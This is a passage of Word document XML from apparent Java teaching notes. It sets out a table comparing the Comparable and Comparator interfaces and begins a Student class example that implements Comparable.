                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>java.lang</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E3451E4" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>java.util</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="302AC26E" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F649DC" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E7C4D8C" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Defines </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>natural ordering</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> of objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71B7B86B" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Defines </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>custom ordering</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> of objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="176AFE84" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7371BC9E" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Interface method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D5DDE40" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>int compareTo(T o)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="452429F9" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>int compare(T o1, T o2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="34A9CCF6" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB2C53F" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Implemented by</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B46040A" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>The class whose objects are being compared</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3815BABE" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Separate class (or anonymous class / lambda)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="79D67327" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7128CD36" w14:textId="780049EB" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Affects</w:t>
            </w:r>
            <w:r w:rsidR="00591839" w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>original class?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45557446" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes, class must implement </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Comparable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A5A6B61" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No, keeps original class unchanged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="63BC6203" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="330C9661" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Used in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04F1E0C8" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Collections.sort(list)</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (no comparator)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E490E74" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Collections.sort(list, comparator)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="216342BC" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D09002E" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java 8+ usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D58BE8C" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Can use lambda indirectly through </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>compareTo()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0092F8E6" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Often used with lambda expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7803DC18" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00062B56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="45669D3D">
          <v:rect id="_x0000_i1107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="471F7A18" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9BC635" w14:textId="77777777" w:rsidR="00062B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00062B56" w:rsidP="00062B56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB984EC" w14:textId="77777777" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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489570"/>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ude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mplement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omparable</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udent</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42D1579" w14:textId="77777777" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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48957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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D7E3A" w14:textId="77777777" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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48957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5500448C" w14:textId="77777777" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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489570"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065281A9" w14:textId="77777777" w:rsidR="001E0981" w:rsidRPr="00CE4B95"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48957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compareTo</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udent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
